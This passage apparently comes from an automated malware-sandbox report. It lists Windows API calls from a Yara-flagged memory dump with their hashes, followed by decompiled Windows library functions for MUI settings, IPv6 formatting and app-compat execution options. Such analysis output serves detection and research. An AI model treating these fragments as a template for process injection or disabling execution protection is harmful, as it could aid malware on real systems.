                                          • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0008A734
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: 0476b1f1081adc5770f695d19d77e3fccb12c3c89d2a1220b84b869ae91f608c
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: A201B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007F050,?,?,00000000), ref: 000891EC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 236890109d5f47e6558ac83bc9aeef32022f5cbfd77f367dac5f0e44bb39fd7d
                                          • Instruction ID: 30cba1fb75781945e69a9b35cb7ca5d2609d11f2abe6e541c4dc01d4ecccfac4
                                          • Opcode Fuzzy Hash: 236890109d5f47e6558ac83bc9aeef32022f5cbfd77f367dac5f0e44bb39fd7d
                                          • Instruction Fuzzy Hash: 70F0237968974135E73072745C87FF76A456F91B10F180526F2987E5C3D8D8A4054395
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0007F050,?,?,00000000), ref: 000891EC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: b68e6f369081869e3b8fd31e12c5b2d380daa11ca5a0600d0435d8fbc4efec32
                                          • Instruction ID: 373d9e65f5d98bb607dccc2aa7936598134940a3505fe9e58512421c90d47018
                                          • Opcode Fuzzy Hash: b68e6f369081869e3b8fd31e12c5b2d380daa11ca5a0600d0435d8fbc4efec32
                                          • Instruction Fuzzy Hash: 8EE06D373802043AE62075A9AC02FE7B29CAB91B20F150026FA4DEA2C2D995F80143A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00084536,?,00084CAF,00084CAF,?,00084536,?,?,?,?,?,00000000,00000000,?), ref: 0008A65D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: e4a3b5555a0ecd646342859cfd2bfc0e18779972e92a541dd2b9e21fbb41912f
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: ADE012B1200208ABDB14EF99CC41EA777ACEF88654F118559BA085B242C630F9108BB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0007F1D2,0007F1D2,?,00000000,?,?), ref: 0008A800
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: 309186c580a382a61ffb9c83d2a66c2228bcd0ac1c2c8a2cf842a7d5d9f71115
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: 8CE01AB12002086BDB10EF89CC85EE737ADEF89650F118165BA0857242C934E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00078D14,?), ref: 0007F6FB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Offset: 00070000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction ID: 2b497bff48ec278f26eba221411dd280b8d181ac00b0d1e7ba025ff9b24c22e2
                                          • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                          • Instruction Fuzzy Hash: 9BD05E616503092AE610BAA49C03F6632C86B44B04F4A4064FA48962C3E954E4014165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 94%
                                          			E02348788(signed int __ecx, void* __edx, signed int _a4) {
                                          				signed int _v8;
                                          				short* _v12;
                                          				void* _v16;
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				char _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				void* _t216;
                                          				intOrPtr _t231;
                                          				short* _t235;
                                          				intOrPtr _t257;
                                          				short* _t261;
                                          				intOrPtr _t284;
                                          				intOrPtr _t288;
                                          				void* _t314;
                                          				signed int _t318;
                                          				short* _t319;
                                          				intOrPtr _t321;
                                          				void* _t328;
                                          				void* _t329;
                                          				char* _t332;
                                          				signed int _t333;
                                          				signed int* _t334;
                                          				void* _t335;
                                          				void* _t338;
                                          				void* _t339;
                                          
                                          				_t328 = __edx;
                                          				_t322 = __ecx;
                                          				_t318 = 0;
                                          				_t334 = _a4;
                                          				_v8 = 0;
                                          				_v28 = 0;
                                          				_v48 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v52 = 0;
                                          				if(_t334 == 0) {
                                          					_t329 = 0xc000000d;
                                          					L49:
                                          					_t334[0x11] = _v56;
                                          					 *_t334 =  *_t334 | 0x00000800;
                                          					_t334[0x12] = _v60;
                                          					_t334[0x13] = _v28;
                                          					_t334[0x17] = _v20;
                                          					_t334[0x16] = _v48;
                                          					_t334[0x18] = _v40;
                                          					_t334[0x14] = _v32;
                                          					_t334[0x15] = _v52;
                                          					return _t329;
                                          				}
                                          				_v56 = 0;
                                          				if(E02348460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          						_t207 = E0232E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                          					}
                                          					_push(1);
                                          					_v8 = _t318;
                                          					E0234718A(_t207);
                                          					_t335 = _t335 + 4;
                                          				}
                                          				_v60 = _v60 | 0xffffffff;
                                          				if(E02348460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                          					_t333 =  *_v8;
                                          					_v60 = _t333;
                                          					_t314 = E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          					_push(_t333);
                                          					_v8 = _t318;
                                          					E0234718A(_t314);
                                          					_t335 = _t335 + 4;
                                          				}
                                          				_t216 = E02348460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                          				_t332 = ";";
                                          				if(_t216 < 0) {
                                          					L17:
                                          					if(E02348460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                          						L30:
                                          						if(E02348460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                          							L46:
                                          							_t329 = 0;
                                          							L47:
                                          							if(_v8 != _t318) {
                                          								E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          							}
                                          							if(_v28 != _t318) {
                                          								if(_v20 != _t318) {
                                          									E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                          									_v20 = _t318;
                                          									_v40 = _t318;
                                          								}
                                          							}
                                          							goto L49;
                                          						}
                                          						_t231 = _v24;
                                          						_t322 = _t231 + 4;
                                          						_push(_t231);
                                          						_v52 = _t322;
                                          						E0234718A(_t231);
                                          						if(_t322 == _t318) {
                                          							_v32 = _t318;
                                          						} else {
                                          							_v32 = E0232E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          						}
                                          						if(_v32 == _t318) {
                                          							_v52 = _t318;
                                          							L58:
                                          							_t329 = 0xc0000017;
                                          							goto L47;
                                          						} else {
                                          							E02322340(_v32, _v8, _v24);
                                          							_v16 = _v32;
                                          							_a4 = _t318;
                                          							_t235 = E0233E679(_v32, _t332);
                                          							while(1) {
                                          								_t319 = _t235;
                                          								if(_t319 == 0) {
                                          									break;
                                          								}
                                          								 *_t319 = 0;
                                          								_t321 = _t319 + 2;
                                          								E0232E2A8(_t322,  &_v68, _v16);
                                          								if(E02345553(_t328,  &_v68,  &_v36) != 0) {
                                          									_a4 = _a4 + 1;
                                          								}
                                          								_v16 = _t321;
                                          								_t235 = E0233E679(_t321, _t332);
                                          								_pop(_t322);
                                          							}
                                          							_t236 = _v16;
                                          							if( *_v16 != _t319) {
                                          								E0232E2A8(_t322,  &_v68, _t236);
                                          								if(E02345553(_t328,  &_v68,  &_v36) != 0) {
                                          									_a4 = _a4 + 1;
                                          								}
                                          							}
                                          							if(_a4 == 0) {
                                          								E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                          								_v52 = _v52 & 0x00000000;
                                          								_v32 = _v32 & 0x00000000;
                                          							}
                                          							if(_v8 != 0) {
                                          								E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                          							}
                                          							_v8 = _v8 & 0x00000000;
                                          							_t318 = 0;
                                          							goto L46;
                                          						}
                                          					}
                                          					_t257 = _v24;
                                          					_t322 = _t257 + 4;
                                          					_push(_t257);
                                          					_v40 = _t322;
                                          					E0234718A(_t257);
                                          					_t338 = _t335 + 4;
                                          					if(_t322 == _t318) {
                                          						_v20 = _t318;
                                          					} else {
                                          						_v20 = E0232E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          					}
                                          					if(_v20 == _t318) {
                                          						_v40 = _t318;
                                          						goto L58;
                                          					} else {
                                          						E02322340(_v20, _v8, _v24);
                                          						_v16 = _v20;
                                          						_a4 = _t318;
                                          						_t261 = E0233E679(_v20, _t332);
                                          						_t335 = _t338 + 0x14;
                                          						while(1) {
                                          							_v12 = _t261;
                                          							if(_t261 == _t318) {
                                          								break;
                                          							}
                                          							_v12 = _v12 + 2;
                                          							 *_v12 = 0;
                                          							E0232E2A8(_v12,  &_v68, _v16);
                                          							if(E02345553(_t328,  &_v68,  &_v36) != 0) {
                                          								_a4 = _a4 + 1;
                                          							}
                                          							_v16 = _v12;
                                          							_t261 = E0233E679(_v12, _t332);
                                          							_pop(_t322);
                                          						}
                                          						_t269 = _v16;
                                          						if( *_v16 != _t318) {
                                          							E0232E2A8(_t322,  &_v68, _t269);
                                          							if(E02345553(_t328,  &_v68,  &_v36) != 0) {
                                          								_a4 = _a4 + 1;
                                          							}
                                          						}
                                          						if(_a4 == _t318) {
                                          							E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                          							_v40 = _t318;
                                          							_v20 = _t318;
                                          						}
                                          						if(_v8 != _t318) {
                                          							E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          						}
                                          						_v8 = _t318;
                                          						goto L30;
                                          					}
                                          				}
                                          				_t284 = _v24;
                                          				_t322 = _t284 + 4;
                                          				_push(_t284);
                                          				_v48 = _t322;
                                          				E0234718A(_t284);
                                          				_t339 = _t335 + 4;
                                          				if(_t322 == _t318) {
                                          					_v28 = _t318;
                                          				} else {
                                          					_v28 = E0232E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          				}
                                          				if(_v28 == _t318) {
                                          					_v48 = _t318;
                                          					goto L58;
                                          				} else {
                                          					E02322340(_v28, _v8, _v24);
                                          					_v16 = _v28;
                                          					_a4 = _t318;
                                          					_t288 = E0233E679(_v28, _t332);
                                          					_t335 = _t339 + 0x14;
                                          					while(1) {
                                          						_v12 = _t288;
                                          						if(_t288 == _t318) {
                                          							break;
                                          						}
                                          						_v12 = _v12 + 2;
                                          						 *_v12 = 0;
                                          						E0232E2A8(_v12,  &_v68, _v16);
                                          						if(E02345553(_t328,  &_v68,  &_v36) != 0) {
                                          							_a4 = _a4 + 1;
                                          						}
                                          						_v16 = _v12;
                                          						_t288 = E0233E679(_v12, _t332);
                                          						_pop(_t322);
                                          					}
                                          					_t296 = _v16;
                                          					if( *_v16 != _t318) {
                                          						E0232E2A8(_t322,  &_v68, _t296);
                                          						if(E02345553(_t328,  &_v68,  &_v36) != 0) {
                                          							_a4 = _a4 + 1;
                                          						}
                                          					}
                                          					if(_a4 == _t318) {
                                          						E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                          						_v48 = _t318;
                                          						_v28 = _t318;
                                          					}
                                          					if(_v8 != _t318) {
                                          						E0232E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          					}
                                          					_v8 = _t318;
                                          					goto L17;
                                          				}
                                          			}





































                                          0x0234897e
                                          0x02348981
                                          0x02348981
                                          0x02348986
                                          0x00000000
                                          0x00000000
                                          0x02391b6e
                                          0x02391b74
                                          0x02391b7b
                                          0x02391b8f
                                          0x02391b91
                                          0x02391b91
                                          0x02391b99
                                          0x02391b9c
                                          0x02391ba2
                                          0x02391ba2
                                          0x0234898c
                                          0x02348992
                                          0x02348999
                                          0x023489ad
                                          0x02391ba8
                                          0x02391ba8
                                          0x023489ad
                                          0x023489b6
                                          0x023489c8
                                          0x023489cd
                                          0x023489d0
                                          0x023489d0
                                          0x023489d6
                                          0x023489e8
                                          0x023489e8
                                          0x023489ed
                                          0x00000000
                                          0x023489ed
                                          0x0234895a
                                          0x0234883e
                                          0x02348841
                                          0x02348844
                                          0x02348845
                                          0x02348848
                                          0x0234884d
                                          0x02348852
                                          0x02348b49
                                          0x02348858
                                          0x0234886c
                                          0x0234886c
                                          0x02348872
                                          0x02391b0e
                                          0x00000000
                                          0x02348878
                                          0x02348881
                                          0x0234888b
                                          0x0234888e
                                          0x02348891
                                          0x02348896
                                          0x02348899
                                          0x02348899
                                          0x0234889e
                                          0x00000000
                                          0x00000000
                                          0x02391b21
                                          0x02391b27
                                          0x02391b2e
                                          0x02391b42
                                          0x02391b44
                                          0x02391b44
                                          0x02391b4c
                                          0x02391b4f
                                          0x02391b55
                                          0x02391b55
                                          0x023488a4
                                          0x023488aa
                                          0x023488b1
                                          0x023488c5
                                          0x02391b5b
                                          0x02391b5b
                                          0x023488c5
                                          0x023488ce
                                          0x023488e0
                                          0x023488e5
                                          0x023488e8
                                          0x023488e8
                                          0x023488ee
                                          0x02348900
                                          0x02348900
                                          0x02348905
                                          0x00000000
                                          0x02348905

                                          APIs
                                          Strings
                                          • Kernel-MUI-Language-SKU, xrefs: 023489FC
                                          • Kernel-MUI-Language-Allowed, xrefs: 02348827
                                          • Kernel-MUI-Number-Allowed, xrefs: 023487E6
                                          • WindowsExcludedProcs, xrefs: 023487C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 02348914
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: 64e7f0202c504cd7bfb4fab4d65f89137580a40b91743e30d0333cef992747a8
                                          • Instruction ID: 6390b0c4f308f43781036f2f3238a2366f369d4cc3a91282d11da5fb445e6ebe
                                          • Opcode Fuzzy Hash: 64e7f0202c504cd7bfb4fab4d65f89137580a40b91743e30d0333cef992747a8
                                          • Instruction Fuzzy Hash: 05F1C7B2D00219EFCF61EF99C9809EEB7F9BF08304F1444AAE505A7611EB35AA45DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E023613CB(intOrPtr* _a4, intOrPtr _a8) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				intOrPtr _t71;
                                          				signed int _t78;
                                          				signed int _t86;
                                          				char _t90;
                                          				signed int _t91;
                                          				signed int _t96;
                                          				intOrPtr _t108;
                                          				signed int _t114;
                                          				void* _t115;
                                          				intOrPtr _t128;
                                          				intOrPtr* _t129;
                                          				void* _t130;
                                          
                                          				_t129 = _a4;
                                          				_t128 = _a8;
                                          				_t116 = 0;
                                          				_t71 = _t128 + 0x5c;
                                          				_v8 = 8;
                                          				_v20 = _t71;
                                          				if( *_t129 == 0) {
                                          					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                          						goto L5;
                                          					} else {
                                          						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                          						if(_t96 != 0) {
                                          							L38:
                                          							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                          								goto L5;
                                          							} else {
                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                          								_t86 = E02357707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                          								L36:
                                          								return _t128 + _t86 * 2;
                                          							}
                                          						}
                                          						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                          						if(_t114 == 0) {
                                          							L33:
                                          							_t115 = 0x2322926;
                                          							L35:
                                          							_push( *(_t129 + 0xf) & 0x000000ff);
                                          							_push( *(_t129 + 0xe) & 0x000000ff);
                                          							_push( *(_t129 + 0xd) & 0x000000ff);
                                          							_push( *(_t129 + 0xc) & 0x000000ff);
                                          							_t86 = E02357707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                          							goto L36;
                                          						}
                                          						if(_t114 != 0xffff) {
                                          							_t116 = 0;
                                          							goto L38;
                                          						}
                                          						if(_t114 != 0) {
                                          							_t115 = 0x2329cac;
                                          							goto L35;
                                          						}
                                          						goto L33;
                                          					}
                                          				} else {
                                          					L5:
                                          					_a8 = _t116;
                                          					_a4 = _t116;
                                          					_v12 = _t116;
                                          					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                          						if( *(_t129 + 0xa) == 0xfe5e) {
                                          							_v8 = 6;
                                          						}
                                          					}
                                          					_t90 = _v8;
                                          					if(_t90 <= _t116) {
                                          						L11:
                                          						if(_a8 - _a4 <= 1) {
                                          							_a8 = _t116;
                                          							_a4 = _t116;
                                          						}
                                          						_t91 = 0;
                                          						if(_v8 <= _t116) {
                                          							L22:
                                          							if(_v8 < 8) {
                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                          								_t128 = _t128 + E02357707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                          							}
                                          							return _t128;
                                          						} else {
                                          							L14:
                                          							L14:
                                          							if(_a4 > _t91 || _t91 >= _a8) {
                                          								if(_t91 != _t116 && _t91 != _a8) {
                                          									_push(":");
                                          									_push(_t71 - _t128 >> 1);
                                          									_push(_t128);
                                          									_t128 = _t128 + E02357707() * 2;
                                          									_t71 = _v20;
                                          									_t130 = _t130 + 0xc;
                                          								}
                                          								_t78 = E02357707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                          								_t130 = _t130 + 0x10;
                                          							} else {
                                          								_push(L"::");
                                          								_push(_t71 - _t128 >> 1);
                                          								_push(_t128);
                                          								_t78 = E02357707();
                                          								_t130 = _t130 + 0xc;
                                          								_t91 = _a8 - 1;
                                          							}
                                          							_t91 = _t91 + 1;
                                          							_t128 = _t128 + _t78 * 2;
                                          							_t71 = _v20;
                                          							if(_t91 >= _v8) {
                                          								goto L22;
                                          							}
                                          							_t116 = 0;
                                          							goto L14;
                                          						}
                                          					} else {
                                          						_t108 = 1;
                                          						_v16 = _t129;
                                          						_v24 = _t90;
                                          						do {
                                          							if( *_v16 == _t116) {
                                          								if(_t108 - _v12 > _a8 - _a4) {
                                          									_a4 = _v12;
                                          									_a8 = _t108;
                                          								}
                                          								_t116 = 0;
                                          							} else {
                                          								_v12 = _t108;
                                          							}
                                          							_v16 = _v16 + 2;
                                          							_t108 = _t108 + 1;
                                          							_t26 =  &_v24;
                                          							 *_t26 = _v24 - 1;
                                          						} while ( *_t26 != 0);
                                          						goto L11;
                                          					}
                                          				}
                                          			}


                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: d17e2f6952d03ec9b894437e7d7300d4c80f34af61e47e2789afedca48065223
                                          • Instruction ID: 51ca74e02914d09ce333e5e0598337e8b100b7ef19e9dba66660039c616afa3c
                                          • Opcode Fuzzy Hash: d17e2f6952d03ec9b894437e7d7300d4c80f34af61e47e2789afedca48065223
                                          • Instruction Fuzzy Hash: 4A613671E00665AACF35DF59C8849BFBBB9EF84300B18C02EF4DA47A44D374A640DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 64%
                                          			E02357EFD(void* __ecx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				char _v540;
                                          				unsigned int _v544;
                                          				signed int _v548;
                                          				intOrPtr _v552;
                                          				char _v556;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t33;
                                          				void* _t38;
                                          				unsigned int _t46;
                                          				unsigned int _t47;
                                          				unsigned int _t52;
                                          				intOrPtr _t56;
                                          				unsigned int _t62;
                                          				void* _t69;
                                          				void* _t70;
                                          				intOrPtr _t72;
                                          				signed int _t73;
                                          				void* _t74;
                                          				void* _t75;
                                          				void* _t76;
                                          				void* _t77;
                                          
                                          				_t33 =  *0x2402088; // 0x76a365d9
                                          				_v8 = _t33 ^ _t73;
                                          				_v548 = _v548 & 0x00000000;
                                          				_t72 = _a4;
                                          				if(E02357F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                          					__eflags = _v548;
                                          					if(_v548 == 0) {
                                          						goto L1;
                                          					}
                                          					_t62 = _t72 + 0x24;
                                          					E02373F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                          					_t71 = 0x214;
                                          					_v544 = 0x214;
                                          					E0232DFC0( &_v540, 0, 0x214);
                                          					_t75 = _t74 + 0x20;
                                          					_t46 =  *0x2404218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                          					__eflags = _t46;
                                          					if(_t46 == 0) {
                                          						goto L1;
                                          					}
                                          					_t47 = _v544;
                                          					__eflags = _t47;
                                          					if(_t47 == 0) {
                                          						goto L1;
                                          					}
                                          					__eflags = _t47 - 0x214;
                                          					if(_t47 >= 0x214) {
                                          						goto L1;
                                          					}
                                          					_push(_t62);
                                          					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                          					E02373F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                          					_t52 = E02330D27( &_v540, L"Execute=1");
                                          					_t76 = _t75 + 0x1c;
                                          					_push(_t62);
                                          					__eflags = _t52;
                                          					if(_t52 == 0) {
                                          						E02373F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                          						_t71 =  &_v540;
                                          						_t56 = _t73 + _v544 - 0x218;
                                          						_t77 = _t76 + 0x14;
                                          						_v552 = _t56;
                                          						__eflags = _t71 - _t56;
                                          						if(_t71 >= _t56) {
                                          							goto L1;
                                          						} else {
                                          							goto L10;
                                          						}
                                          						while(1) {
                                          							L10:
                                          							_t62 = E02338375(_t71, 0x20);
                                          							_pop(_t69);
                                          							__eflags = _t62;
                                          							if(__eflags != 0) {
                                          								__eflags = 0;
                                          								 *_t62 = 0;
                                          							}
                                          							E02373F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                          							_t77 = _t77 + 0x10;
                                          							E0239E8DB(_t69, _t70, __eflags, _t72, _t71);
                                          							__eflags = _t62;
                                          							if(_t62 == 0) {
                                          								goto L1;
                                          							}
                                          							_t31 = _t62 + 2; // 0x2
                                          							_t71 = _t31;
                                          							__eflags = _t71 - _v552;
                                          							if(_t71 >= _v552) {
                                          								goto L1;
                                          							}
                                          						}
                                          					}
                                          					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                          					_push(3);
                                          					_push(0x55);
                                          					E02373F92();
                                          					_t38 = 1;
                                          					L2:
                                          					return E0232E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                          				}
                                          				L1:
                                          				_t38 = 0;
                                          				goto L2;
                                          			}

                                          APIs
                                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02373F12
                                          Strings
                                          • ExecuteOptions, xrefs: 02373F04
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02373F75
                                          • Execute=1, xrefs: 02373F5E
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0237E2FB
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02373F4A
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0237E345
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02373EC4
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
